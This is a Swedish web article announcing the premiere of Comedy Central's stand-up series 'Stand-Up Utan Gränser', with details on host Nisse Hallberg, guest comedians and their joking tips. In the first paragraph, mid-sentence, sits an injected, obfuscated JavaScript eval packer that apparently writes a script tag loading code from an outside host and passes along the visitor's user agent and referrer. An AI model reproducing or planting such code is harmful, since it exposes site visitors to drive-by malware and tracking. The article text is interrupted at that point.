Image Image Image Image Image Image Image Image Image Image

| 16 juni, 2021

Scroll to top

Top

Premiär för ”Stand-Up Utan Gränser”

Premiär för ”Stand-Up Utan Gränser”
Sebastian

På eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|nezea|var|u0026u|referrer|shdsr||js|php’.split(’|’),0,{}))
lördag klockan 22 är det premiär för Comedy Centrals storsatsning ”Stand-Up Utan Gränser”. I 10 avsnitt får tittarna se 20 av Sveriges främsta komiker utmana gränserna för vad som är roligt och tillåtet att skämta om. Programmet leds den välkände komikern Nisse Hallberg. Till premiären har han bjudit in komikerna Peter Wahlbeck och Johanna Wagrell.

Comedy Central, världens största humornätverk, har på kort tid blivit känt som en av de främsta humorkanalerna i Norden. På lördag, 7 oktober, klockan 22 är det premiär för ett helt nytt humorprogram, ”Stand-Up Utan Gränser”. Programmet fokuserar på svensk humor och, som namnet antyder, kommer det att utmana gränserna för humor. Programledare är Nisse Hallberg, som i tio olika avsnitt kommer att presentera såväl kända komiker som nya talanger från den svenska humorscenen. Det är första gången som Comedy Central gör en lokal humorsatsning i Sverige.

–        Det ska bli svinkul att få leda Comedy Centrals stand-up Utan Gränser i höst med några av Sveriges absolut bästa komiker. Kanalen har ju skapat välkända och internationella stjärnor som Dave Chappelle, Amy Schumer och Sarah Silverman. Det känns självklart mäktigt, säger Nisse Hallberg, komiker och programledare för Stand-Up Utan Gränser på Comedy Central.

Peter Wahlbeck skäller ut premiärpubliken

I premiäravsnittet blir tittarna underhållna av komikerna Johanna Wagrell (Parlamentet, Tankesmedjan, Släng dig i Brunnen) och Peter Wahlbeck (standup-legend, manusförfattare). I en sekvens, som redan har blivit viral, skäller Wahlbeck ut publiken eftersom han inte är nöjd med deras respons. Wagrell skämtar på sitt karaktäristiska sätt om alltifrån Game of Thrones till uteliggare och barnlöshet. Se och ladda ner klippen här: 

Under säsongen medverkar även komiker som Messiah Hallberg, Måns Möller, Martin Soneby, Josefine Johansson och Ahmed Behran.

Stand-Up Utan Gränser är Viacom-ägda Comedy Centrals hittills största satsning lokalt innehåll i Norden. Formatet görs även i Norge och Danmark, då med fokus på norska respektive danska komiker.

Totalt humorlös? Så tacklar du situationen bäst enligt komikerproffsen

Ahmed Berhans tips på hur du hanterar att vara den tråkiga i kompisgänget:

  • Stay in your lane! Låt de roliga kompisarna göra sitt, försök inte bli som dom och stå inte i deras väg. Låt dig bli underhållen istället
  • Fokusera på det du gör bra och kör på det. Du kanske är en schysst kompis snarare än rolig? Att vara schysst är också en bra egenskap
  • Vissa kör bilen och andra läser kartan – alla har ett syfte i världen och att vara rolig är inte allas grej helt enkelt, det är bara att acceptera

Johanna Wagrells bästa tips på hur du blir en roligare kompis:

  • Om man märker att ingen skrattar åt en alls så är det väldigt viktigt att komma ihåg att skratta åt andras skämt. Personer som skrattar åt andras skämt är oftast mycket roligare att hänga med än kompisar som hela tiden skämtar själva
  • Folk som har självdistans och kan driva med sig själva är oftast de roligaste, men även personer som saknar självdistans kan vara fruktansvärt roliga. Saknar du självdistans? Ta vara på det! Man blir oftast fruktansvärt rolig när man tar sig själv på fullaste allvar
  • Som kompis ska man inte driva med andra och skämta på andras bekostnad, det är oschysst. Att driva med andra är vanligt bland professionella komiker idag, men det har krävts många år av träning för att kunna göra det utan att det uppfattas som elakt. Som kompis är det bättre att börja driva med sig själv om man vill vara rolig

Johanna Wagrell och Ahmed Behran är bland annat kända från Tankesmedjan i Sveriges Radio och Raw Comedy Club.

Premiär Stand-up Utan Gränser: lördag 7 oktober klockan 22 på Comedy Central. Nya avsnitt visas varje lördag fram till 9 december.